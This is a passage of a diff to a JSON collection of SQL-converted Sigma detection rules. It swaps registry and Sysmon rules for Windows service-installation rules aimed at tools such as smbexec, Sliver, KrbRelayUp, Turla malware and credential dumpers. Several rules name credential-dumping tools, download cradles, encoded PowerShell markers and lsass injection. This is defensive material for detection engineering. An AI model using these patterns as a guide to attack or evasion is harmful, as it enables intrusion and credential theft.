"eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": 
"Omer Faruk Celik", "tags": [ - "attack.defense_evasion", + "attack.lateral_movement", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server 
Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. 
a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 
'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "status": "experimental", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = 
'7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of 
process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055.012" - ], - "falsepositives": [ - "There are no known false positives at this time" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" - ], - "filename": "sysmon_process_hollowing.yml" - }, - { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.t1543" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to 
open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": 
"Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. 
Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": 